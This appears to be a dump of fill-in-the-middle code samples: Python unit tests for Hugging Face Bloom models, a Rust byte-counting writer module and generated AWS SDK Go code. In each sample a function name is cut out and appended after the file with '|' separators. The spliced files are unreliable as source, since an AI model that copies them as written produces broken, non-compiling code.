random_other_next_tokens = ids_tensor((self.batch_size, 1), config.vocab_size).squeeze(-1)
input_ids[:, -random_seq_idx_to_change] = random_other_next_tokens
# append to next input_ids and attn_mask
next_input_ids = torch.cat([input_ids, next_tokens], dim=-1)
attn_mask = torch.cat(
[attn_mask, torch.ones((attn_mask.shape[0], 1), dtype=torch.long, device=torch_device)],
dim=1,
)
# get two different outputs
output_from_no_past = model(next_input_ids, attention_mask=attn_mask)["last_hidden_state"]
output_from_past = model(next_tokens, past_key_values=past, attention_mask=attn_mask)["last_hidden_state"]
# select random slice
random_slice_idx = ids_tensor((1,), output_from_past.shape[-1]).item()
output_from_no_past_slice = output_from_no_past[:, -1, random_slice_idx].detach()
output_from_past_slice = output_from_past[:, 0, random_slice_idx].detach()
# test that outputs are equal for slice
self.parent.assertTrue(torch.allclose(output_from_past_slice, output_from_no_past_slice, atol=1e-3))
def create_and_check_bloom_model_past_large_inputs(self, config, input_ids, input_mask, *args):
model = BloomModel(config=config)
model.to(torch_device)
model.eval()
# first forward pass
outputs = model(input_ids, attention_mask=input_mask, use_cache=True)
output, past = outputs.to_tuple()
# create hypothetical next token and extent to next_input_ids
next_tokens = ids_tensor((self.batch_size, 3), config.vocab_size)
next_mask = ids_tensor((self.batch_size, 3), vocab_size=2)
# append to next input_ids and token_type_ids
next_input_ids = torch.cat([input_ids, next_tokens], dim=-1)
next_attention_mask = torch.cat([input_mask, next_mask], dim=-1)
output_from_no_past = model(next_input_ids, attention_mask=next_attention_mask)["last_hidden_state"]
output_from_past = model(next_tokens, attention_mask=next_attention_mask, past_key_values=past)[
"last_hidden_state"
]
self.parent.assertTrue(output_from_past.shape[1] == next_tokens.shape[1])
# select random slice
random_slice_idx = ids_tensor((1,), output_from_past.shape[-1]).item()
output_from_no_past_slice = output_from_no_past[:, -3:, random_slice_idx].detach()
output_from_past_slice = output_from_past[:, :, random_slice_idx].detach()
# test that outputs are equal for slice
self.parent.assertTrue(torch.allclose(output_from_past_slice, output_from_no_past_slice, atol=1e-3))
def create_and_check_lm_head_model(self, config, input_ids, input_mask, *args):
model = BloomForCausalLM(config)
model.to(torch_device)
model.eval()
result = model(input_ids, labels=input_ids)
self.parent.assertEqual(result.loss.shape, ())
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
def create_and_check_sequence_classification_model(self, config, input_ids, input_mask, *args):
config.num_labels = self.num_labels
model = BloomForSequenceClassification(config)
model.to(torch_device)
model.eval()
result = model(input_ids, attention_mask=input_mask)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_labels))
def create_and_check_token_classification_model(self, config, input_ids, input_mask, *args):
model = BloomForTokenClassification(config)
model.to(torch_device)
model.eval()
result = model(input_ids, attention_mask=input_mask)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.num_labels))
def create_and_check_forward_and_backwards(
self, config, input_ids, input_mask, *args, gradient_checkpointing=False
):
model = BloomForCausalLM(config)
model.to(torch_device)
if gradient_checkpointing:
model.gradient_checkpointing_enable()
result = model(input_ids, labels=input_ids)
self.parent.assertEqual(result.loss.shape, ())
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
result.loss.backward()
def create_and_check_bloom_weight_initialization(self, config, *args):
model = BloomModel(config)
model_std = model.config.initializer_range / math.sqrt(2 * model.config.n_layer)
for key in model.state_dict().keys():
if "c_proj" in key and "weight" in key:
self.parent.assertLessEqual(abs(torch.std(model.state_dict()[key]) - model_std), 0.001)
self.parent.assertLessEqual(abs(torch.mean(model.state_dict()[key]) - 0.0), 0.01)
def prepare_config_and_inputs_for_common(self):
config_and_inputs = self.prepare_config_and_inputs()
config, input_ids, input_mask, sequence_labels = config_and_inputs
inputs_dict = {"input_ids": input_ids}
return config, inputs_dict
@require_torch
class BloomModelTest(ModelTesterMixin, GenerationTesterMixin, unittest.TestCase):
all_model_classes = (
(
BloomModel,
BloomForCausalLM,
BloomForSequenceClassification,
BloomForTokenClassification,
)
if is_torch_available()
else ()
)
all_generative_model_classes = (BloomForCausalLM,) if is_torch_available() else ()
fx_compatible = False
test_missing_keys = False
test_pruning = False
test_torchscript = True # torch.autograd functions seems to be not supported
def setUp(self):
self.model_tester = BloomModelTester(self)
self.config_tester = ConfigTester(self, config_class=BloomConfig, n_embd=37)
def test_config(self):
self.config_tester.run_common_tests()
def test_bloom_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_bloom_model(*config_and_inputs)
def test_bloom_model_past(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_bloom_model_past(*config_and_inputs)
def test_bloom_model_att_mask_past(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_bloom_model_attention_mask_past(*config_and_inputs)
def test_bloom_model_past_large_inputs(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_bloom_model_past_large_inputs(*config_and_inputs)
def test_bloom_lm_head_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_lm_head_model(*config_and_inputs)
def test_bloom_sequence_classification_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_sequence_classification_model(*config_and_inputs)
def test_bloom_token_classification_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_token_classification_model(*config_and_inputs)
def test_bloom_gradient_checkpointing(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_forward_and_backwards(*config_and_inputs, gradient_checkpointing=True)
def test_bloom_weight_initialization(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_bloom_weight_initialization(*config_and_inputs)
@slow
def test_model_from_pretrained(self):
for model_name in BLOOM_PRETRAINED_MODEL_ARCHIVE_LIST[:1]:
model = BloomModel.from_pretrained(model_name)
self.assertIsNotNone(model)
@slow
@require_torch_gpu
def test_simple_generation(self):
path_350m = "bigscience/bloom-350m"
model = BloomForCausalLM.from_pretrained(path_350m, torch_dtype="auto", use_cache=True).cuda()
model = model.eval()
tokenizer = BloomTokenizerFast.from_pretrained(path_350m)
input_sentence = "I enjoy walking with my cute dog"
EXPECTED_OUTPUT = (
"I enjoy walking with my cute dog, and I love to watch the kids play. I am a very active person, and I am"
" a very good listener. I am a very good person, and I am a very good person. I am a"
)
input_ids = tokenizer.encode(input_sentence, return_tensors="pt")
greedy_output = model.generate(input_ids.cuda(), max_length=50)
self.assertEqual(tokenizer.decode(greedy_output[0], skip_special_tokens=True), EXPECTED_OUTPUT)
@slow
@require_torch_gpu
def
|
(self):
path_350m = "bigscience/bloom-350m"
model = BloomForCausalLM.from_pretrained(path_350m, torch_dtype="auto", use_cache=True).cuda()
model = model.eval()
tokenizer = BloomTokenizerFast.from_pretrained(path_350m, padding_side="left")
input_sentence = ["I enjoy walking with my cute dog", "I enjoy walking with my cute dog"]
input_ids = tokenizer.batch_encode_plus(input_sentence, return_tensors="pt", padding=True)
greedy_output = model.generate(
input_ids["input_ids"].cuda(), attention_mask=input_ids["attention_mask"], max_length=50, do_sample=False
)
self.assertEqual(
tokenizer.decode(greedy_output[0], skip_special_tokens=True),
tokenizer.decode(greedy_output[1], skip_special_tokens=True),
)
@slow
@require_torch_gpu
def test_batch_generation_padd(self):
path_350m = "bigscience/bloom-350m"
model = BloomForCausalLM.from_pretrained(path_350m, torch_dtype="auto", use_cache=True).cuda()
model = model.eval()
tokenizer = BloomTokenizerFast.from_pretrained(path_350m, padding_side="left")
input_sentence = ["I enjoy walking with my cute dog", "Hello my name is"]
input_sentence_without_pad = "Hello my name is"
input_ids = tokenizer.batch_encode_plus(input_sentence, return_tensors="pt", padding=True)
input_ids_without_pad = tokenizer.encode(input_sentence_without_pad, return_tensors="pt")
greedy_output = model.generate(
input_ids["input_ids"].cuda(), attention_mask=input_ids["attention_mask"], max_length=50, do_sample=False
)
greedy_output_without_pad = model.generate(input_ids_without_pad.cuda(), max_length=50, do_sample=False)
# test token values
self.assertEqual(greedy_output[-1, 3:].tolist(), greedy_output_without_pad[0, :-3].tolist())
# test reconstructions
self.assertEqual(
tokenizer.decode(greedy_output[-1, 3:], skip_special_tokens=True),
tokenizer.decode(greedy_output_without_pad[0, :-3], skip_special_tokens=True),
)
@require_torch
class BloomEmbeddingTest(unittest.TestCase):
"""
The goal here is to compare the embeddings generated by the model trained
using Megatron-LM with the one from the transformers library, with a small GPT2-like model
to ensure that the conversion from Megatron-LM to transformers has been done successfully.
The script compares the logits of the embedding layer and the transformer layers.
WARNING: It is expected that these logits will not have exactly the same statistics when running
the code on CPU or GPU. For more info, please visit:
- https://github.com/pytorch/pytorch/issues/76052#issuecomment-1103193548
- https://discuss.pytorch.org/t/reproducibility-issue-between-intel-and-amd-cpus/144779/9
You need to install tokenizers following this readme:
- https://huggingface.co/bigscience-catalogue-data-dev/byte-level-bpe-tokenizer-no-norm-250k-whitespace-and-eos-regex-alpha-v3-dedup-lines-articles
Tokenizer used during training:
- https://huggingface.co/bigscience-catalogue-data-dev/byte-level-bpe-tokenizer-no-norm-250k-whitespace-and-eos-regex-alpha-v3-dedup-lines-articles
# TODO change the script (or just add skip) when building the env with tokenizers 0.12.0
"""
def setUp(self):
super().setUp()
self.path_bigscience_model = "bigscience/bigscience-small-testing"
@require_torch
def test_embeddings(self):
model = BloomForCausalLM.from_pretrained(self.path_bigscience_model, torch_dtype="auto") # load in fp32
model.eval()
EMBEDDINGS_DS_BEFORE_LN_BF_16_MEAN = {
3478: 0.0002307891845703125,
368: -0.000568389892578125,
109586: -0.0003910064697265625,
35433: -0.000194549560546875,
2: 0.0004138946533203125,
77: 0.000659942626953125,
132619: -0.00031280517578125,
2175: 0.000457763671875,
23714: 0.000263214111328125,
73173: -0.000286102294921875,
144252: 0.00052642822265625,
}
EMBEDDINGS_DS_BEFORE_LN_BF_16_MIN = {
3478: -0.00921630859375,
368: -0.010009765625,
109586: -0.01031494140625,
35433: -0.01177978515625,
2: -0.0074462890625,
77: -0.00848388671875,
132619: -0.009521484375,
2175: -0.0074462890625,
23714: -0.0145263671875,
73173: -0.007415771484375,
144252: -0.01007080078125,
}
EMBEDDINGS_DS_BEFORE_LN_BF_16_MAX = {
3478: 0.0128173828125,
368: 0.01214599609375,
109586: 0.0111083984375,
35433: 0.01019287109375,
2: 0.0157470703125,
77: 0.0174560546875,
132619: 0.0078125,
2175: 0.0113525390625,
23714: 0.0146484375,
73173: 0.01116943359375,
144252: 0.01141357421875,
}
EMBEDDINGS_DS_BEFORE_LN_BF_16_SUM = {"value": 0.08203125}
EMBEDDINGS_DS_BEFORE_LN_F_16_MEAN = {
132619: -0.00031256675720214844,
3478: 0.00023090839385986328,
368: -0.0005702972412109375,
109586: -0.00039124488830566406,
35433: -0.000194549560546875,
2: 0.0004146099090576172,
2175: 0.0004572868347167969,
23714: 0.00026416778564453125,
73173: -0.0002865791320800781,
144252: 0.0005254745483398438,
77: 0.0006618499755859375,
}
EMBEDDINGS_DS_BEFORE_LN_F_16_MIN = {
3478: -0.00921630859375,
368: -0.010009765625,
109586: -0.01031494140625,
35433: -0.01177978515625,
2: -0.0074462890625,
77: -0.00848388671875,
132619: -0.009521484375,
2175: -0.0074462890625,
23714: -0.0145263671875,
73173: -0.007415771484375,
144252: -0.01007080078125,
}
EMBEDDINGS_DS_BEFORE_LN_F_16_MAX = {
3478: 0.0128173828125,
368: 0.01214599609375,
109586: 0.0111083984375,
35433: 0.01019287109375,
2: 0.0157470703125,
77: 0.0174560546875,
132619: 0.0078125,
2175: 0.0113525390625,
23714: 0.0146484375,
73173: 0.01116943359375,
144252: 0.01141357421875,
}
EMBEDDINGS_DS_BEFORE_LN_F_16_SUM = {"value": 0.0821533203125}
EMBEDDINGS_DS_BEFORE_LN_F_32_MEAN = {
132619: -0.00031267106533050537,
3478: 0.00023087859153747559,
368: -0.0005701072514057159,
109586: -0.0003911703824996948,
35433: -0.0001944899559020996,
2: 0.0004146844148635864,
2175: 0.00045740045607089996,
23714: 0.0002641640603542328,
73173: -0.0002864748239517212,
144252: 0.0005256589502096176,
77: 0.0006617321632802486,
}
EMBEDDINGS_DS_BEFORE_LN_F_32_MIN = {
3478: -0.00921630859375,
368: -0.010009765625,
109586: -0.01031494140625,
35433: -0.01177978515625,
2: -0.0074462890625,
77: -0.00848388671875,
132619: -0.009521484375,
2175: -0.0074462890625,
23714: -0.0145263671875,
73173: -0.007415771484375,
144252: -0.01007080078125,
}
EMBEDDINGS_DS_BEFORE_LN_F_32_MAX = {
3478: 0.0128173828125,
368: 0.01214599609375,
109586: 0.0111083984375,
35433: 0.01019287109375,
2: 0.0157470703125,
77: 0.0174560546875,
132619: 0.0078125,
2175: 0.0113525390625,
23714: 0.0146484375,
73173: 0.01116943359375,
144252: 0.01141357421875,
}
EMBEDDINGS_DS_BEFORE_LN_F_32_SUM = {"value": 0.08217757940292358}
TEST_EMBEDDINGS = {
"torch.bfloat16": {
"mean": EMBEDDINGS_DS_BEFORE_LN_BF_16_MEAN,
"max": EMBEDDINGS_DS_BEFORE_LN_BF_16_MAX,
"min": EMBEDDINGS_DS_BEFORE_LN_BF_16_MIN,
"sum": EMBEDDINGS_DS_BEFORE_LN_BF_16_SUM,
},
"torch.float32": {
"mean": EMBEDDINGS_DS_BEFORE_LN_F_32_MEAN,
"max": EMBEDDINGS_DS_BEFORE_LN_F_32_MAX,
"min": EMBEDDINGS_DS_BEFORE_LN_F_32_MIN,
"sum": EMBEDDINGS_DS_BEFORE_LN_F_32_SUM,
},
"torch.float": {
"mean": EMBEDDINGS_DS_BEFORE_LN_F_32_MEAN,
"max": EMBEDDINGS_DS_BEFORE_LN_F_32_MAX,
"min": EMBEDDINGS_DS_BEFORE_LN_F_32_MIN,
"sum": EMBEDDINGS_DS_BEFORE_LN_F_32_SUM,
},
"torch.float16": {
"mean": EMBEDDINGS_DS_BEFORE_LN_F_16_MEAN,
"max": EMBEDDINGS_DS_BEFORE_LN_F_16_MAX,
"min": EMBEDDINGS_DS_BEFORE_LN_F_16_MIN,
"sum": EMBEDDINGS_DS_BEFORE_LN_F_16_SUM,
},
}
# fmt: off
EXAMPLE_IDS = [3478, 368, 109586, 35433, 2, 77, 132619, 3478, 368, 109586, 35433, 2, 2175, 23714, 73173, 144252, 2, 77, 132619, 3478]
# fmt: on
EMBEDDINGS_DS_AFTER_LN_MEAN = {
3478: -6.580352783203125e-05,
368: 0.0001316070556640625,
109586: -0.00030517578125,
35433: 4.00543212890625e-05,
2: -7.2479248046875e-05,
77: -8.96453857421875e-05,
132619: 0.0001583099365234375,
2175: 2.1219253540039062e-05,
23714: -0.000247955322265625,
73173: -0.00021839141845703125,
144252: -0.0001430511474609375,
}
EMBEDDINGS_DS_AFTER_LN_MIN = {
3478: -1.6953125,
368: -1.6875,
109586: -1.6875,
35433: -2.125,
2: -1.390625,
77: -1.5390625,
132619: -1.875,
2175: -1.4609375,
23714: -2.296875,
73173: -1.3515625,
144252: -1.78125,
}
EMBEDDINGS_DS_AFTER_LN_MAX = {
3478: 2.265625,
368: 2.28125,
109586: 1.953125,
35433: 1.90625,
2: 2.703125,
77: 2.828125,
132619: 1.65625,
2175: 2.015625,
23714: 2.234375,
73173: 2.171875,
144252: 1.828125,
}
EMBEDDINGS_DS_AFTER_LN = {
"mean": EMBEDDINGS_DS_AFTER_LN_MEAN,
"min": EMBEDDINGS_DS_AFTER_LN_MIN,
"max": EMBEDDINGS_DS_AFTER_LN_MAX,
}
tensor_ids = torch.LongTensor([EXAMPLE_IDS])
with torch.no_grad():
embeddings = model.transformer.word_embeddings(tensor_ids)
embeddings_ln = model.transformer.word_embeddings_layernorm(embeddings) #
# first check the embeddings before LN
output_dict = {"min": {}, "max": {}, "mean": {}, "sum": {"value": embeddings.sum().item()}}
for i, idx in enumerate(EXAMPLE_IDS):
output_dict["min"][idx] = embeddings.min(dim=-1).values[0][i].item()
output_dict["max"][idx] = embeddings.max(dim=-1).values[0][i].item()
output_dict["mean"][idx] = embeddings.mean(dim=-1)[0][i].item()
for key in TEST_EMBEDDINGS[str(model.dtype)].keys():
self.assertDictEqual(TEST_EMBEDDINGS[str(model.dtype)][key], output_dict[key])
output_dict_norm = {"min": {}, "max": {}, "mean": {}}
for i, idx in enumerate(EXAMPLE_IDS):
output_dict_norm["min"][idx] = embeddings_ln.min(dim=-1).values[0][i].item()
output_dict_norm["max"][idx] = embeddings_ln.max(dim=-1).values[0][i].item()
output_dict_norm["mean"][idx] = embeddings_ln.mean(dim=-1)[0][i].item()
# This test does not pass when places = 2
for i, key in enumerate(output_dict_norm.keys()):
for j, idx in enumerate(output_dict[key].keys()):
self.assertAlmostEqual(EMBEDDINGS_DS_AFTER_LN[key][idx], output_dict_norm[key][idx], places=1)
@require_torch
def test_hidden_states_transformers(self):
cuda_available = torch.cuda.is_available()
model = BloomModel.from_pretrained(self.path_bigscience_model, use_cache=False, torch_dtype="auto").to(
torch_device
)
model.eval()
# fmt: off
EXAMPLE_IDS = [3478, 368, 109586, 35433, 2, 77, 132619, 3478, 368, 109586, 35433, 2, 2175, 23714, 73173, 144252, 2, 77, 132619, 3478]
# fmt: on
MEAN_VALUE_LAST_LM = -4.3392181396484375e-05
MIN_MAX_DICT = {"min": -2.0625, "max": 2.75}
tensor_ids = torch.LongTensor([EXAMPLE_IDS])
with torch.no_grad():
logits = model(tensor_ids.to(torch_device))
output_dict = {
"min": logits.last_hidden_state.min(dim=-1).values[0][0].item(),
"max": logits.last_hidden_state.max(dim=-1).values[0][0].item(),
}
if cuda_available:
self.assertAlmostEqual(MEAN_VALUE_LAST_LM, logits.last_hidden_state.mean().item(), places=4)
else:
self.assertAlmostEqual(MEAN_VALUE_LAST_LM, logits.last_hidden_state.mean().item(), places=3)
self.assertDictEqual(MIN_MAX_DICT, output_dict)
@require_torch
def test_logits(self):
cuda_available = torch.cuda.is_available()
model = BloomForCausalLM.from_pretrained(self.path_bigscience_model, use_cache=False, torch_dtype="auto").to(
torch_device
) # load in bf16
model.eval()
# fmt: off
EXAMPLE_IDS = [3478, 368, 109586, 35433, 2, 77, 132619, 3478, 368, 109586, 35433, 2, 2175, 23714, 73173, 144252, 2, 77, 132619, 3478]
# fmt: on
MEAN_LOGITS_GPU_1 = -1.823902130126953e-05
MEAN_LOGITS_GPU_2 = 1.9431114196777344e-05
tensor_ids = torch.LongTensor([EXAMPLE_IDS]).to(torch_device)
with torch.no_grad():
output = model(tensor_ids).logits
output_gpu_1, output_gpu_2 = output.split(125440, dim=-1)
if cuda_available:
self.assertEqual(output_gpu_1.mean().item(), MEAN_LOGITS_GPU_1)
self.assertEqual(output_gpu_2.mean().item(), MEAN_LOGITS_GPU_2)
else:
self.assertAlmostEqual(output_gpu_1.mean().item(), MEAN_LOGITS_GPU_1, places=6) # 1e-06 precision!!
self.assertAlmostEqual(output_gpu_2.mean().item(), MEAN_LOGITS_GPU_2, places=6)
|
test_batch_generation
|
writer.rs
|
use std::io::{self, BufWriter, Write};
pub struct CountingWriter<W> {
underlying: W,
written_bytes: u64,
}
impl<W: Write> CountingWriter<W> {
pub fn wrap(underlying: W) -> CountingWriter<W> {
CountingWriter {
underlying,
written_bytes: 0,
}
}
#[inline]
pub fn written_bytes(&self) -> u64 {
self.written_bytes
}
/// Returns the underlying write object.
/// Note that this method does not trigger any flushing.
#[inline]
pub fn finish(self) -> W {
self.underlying
}
}
impl<W: Write> Write for CountingWriter<W> {
#[inline]
fn write(&mut self, buf: &[u8]) -> io::Result<usize> {
let written_size = self.underlying.write(buf)?;
self.written_bytes += written_size as u64;
Ok(written_size)
}
#[inline]
fn write_all(&mut self, buf: &[u8]) -> io::Result<()> {
self.underlying.write_all(buf)?;
self.written_bytes += buf.len() as u64;
Ok(())
}
#[inline]
fn flush(&mut self) -> io::Result<()> {
self.underlying.flush()
}
}
impl<W: TerminatingWrite> TerminatingWrite for CountingWriter<W> {
#[inline]
fn
|
(&mut self, token: AntiCallToken) -> io::Result<()> {
self.underlying.terminate_ref(token)
}
}
/// Struct used to prevent from calling [`terminate_ref`](trait.TerminatingWrite#method.terminate_ref) directly
///
/// The point is that while the type is public, it cannot be built by anyone
/// outside of this module.
pub struct AntiCallToken(());
/// Trait used to indicate when no more write need to be done on a writer
pub trait TerminatingWrite: Write {
/// Indicate that the writer will no longer be used. Internally call terminate_ref.
fn terminate(mut self) -> io::Result<()>
where
Self: Sized,
{
self.terminate_ref(AntiCallToken(()))
}
/// You should implement this function to define custom behavior.
/// This function should flush any buffer it may hold.
fn terminate_ref(&mut self, _: AntiCallToken) -> io::Result<()>;
}
impl<W: TerminatingWrite + ?Sized> TerminatingWrite for Box<W> {
fn terminate_ref(&mut self, token: AntiCallToken) -> io::Result<()> {
self.as_mut().terminate_ref(token)
}
}
impl<W: TerminatingWrite> TerminatingWrite for BufWriter<W> {
fn terminate_ref(&mut self, a: AntiCallToken) -> io::Result<()> {
self.flush()?;
self.get_mut().terminate_ref(a)
}
}
impl<'a> TerminatingWrite for &'a mut Vec<u8> {
fn terminate_ref(&mut self, _a: AntiCallToken) -> io::Result<()> {
self.flush()
}
}
#[cfg(test)]
mod test {
use super::CountingWriter;
use std::io::Write;
#[test]
fn test_counting_writer() {
let buffer: Vec<u8> = vec![];
let mut counting_writer = CountingWriter::wrap(buffer);
let bytes = (0u8..10u8).collect::<Vec<u8>>();
counting_writer.write_all(&bytes).unwrap();
let len = counting_writer.written_bytes();
let buffer_restituted: Vec<u8> = counting_writer.finish();
assert_eq!(len, 10u64);
assert_eq!(buffer_restituted.len(), 10);
}
}
|
terminate_ref
|
api_op_DescribeComponent.go
|
// Code generated by smithy-go-codegen DO NOT EDIT.
package applicationinsights
import (
"context"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
"github.com/aws/aws-sdk-go-v2/service/applicationinsights/types"
"github.com/aws/smithy-go/middleware"
smithyhttp "github.com/aws/smithy-go/transport/http"
)
// Describes a component and lists the resources that are grouped together in a
// component.
func (c *Client) DescribeComponent(ctx context.Context, params *DescribeComponentInput, optFns ...func(*Options)) (*DescribeComponentOutput, error) {
if params == nil {
params = &DescribeComponentInput{}
}
result, metadata, err := c.invokeOperation(ctx, "DescribeComponent", params, optFns, c.addOperationDescribeComponentMiddlewares)
if err != nil {
return nil, err
}
out := result.(*DescribeComponentOutput)
out.ResultMetadata = metadata
return out, nil
}
type DescribeComponentInput struct {
// The name of the component.
//
// This member is required.
ComponentName *string
// The name of the resource group.
//
// This member is required.
ResourceGroupName *string
noSmithyDocumentSerde
}
type DescribeComponentOutput struct {
// Describes a standalone resource or similarly grouped resources that the
// application is made up of.
ApplicationComponent *types.ApplicationComponent
// The list of resource ARNs that belong to the component.
ResourceList []string
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
noSmithyDocumentSerde
}
func (c *Client) addOperationDescribeComponentMiddlewares(stack *middleware.Stack, options Options) (err error) {
err = stack.Serialize.Add(&awsAwsjson11_serializeOpDescribeComponent{}, middleware.After)
if err != nil {
return err
}
err = stack.Deserialize.Add(&awsAwsjson11_deserializeOpDescribeComponent{}, middleware.After)
if err != nil {
return err
}
if err = addSetLoggerMiddleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil {
return err
}
if err = addResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil {
return err
}
if err = addRetryMiddlewares(stack, options); err != nil {
return err
}
if err = addHTTPSignerV4Middleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddRawResponseToMetadata(stack); err != nil {
return err
}
if err = awsmiddleware.AddRecordResponseTiming(stack); err != nil {
return err
}
if err = addClientUserAgent(stack); err != nil {
return err
}
if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = addOpDescribeComponentValidationMiddleware(stack); err != nil {
return err
}
if err = stack.Initialize.Add(newServiceMetadataMiddleware_opDescribeComponent(options.Region), middleware.Before); err != nil {
return err
}
if err = addRequestIDRetrieverMiddleware(stack); err != nil {
return err
}
if err = addResponseErrorMiddleware(stack); err != nil {
return err
}
if err = addRequestResponseLogging(stack, options); err != nil {
return err
}
return nil
}
func
|
(region string) *awsmiddleware.RegisterServiceMetadata {
return &awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "applicationinsights",
OperationName: "DescribeComponent",
}
}
|
newServiceMetadataMiddleware_opDescribeComponent
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.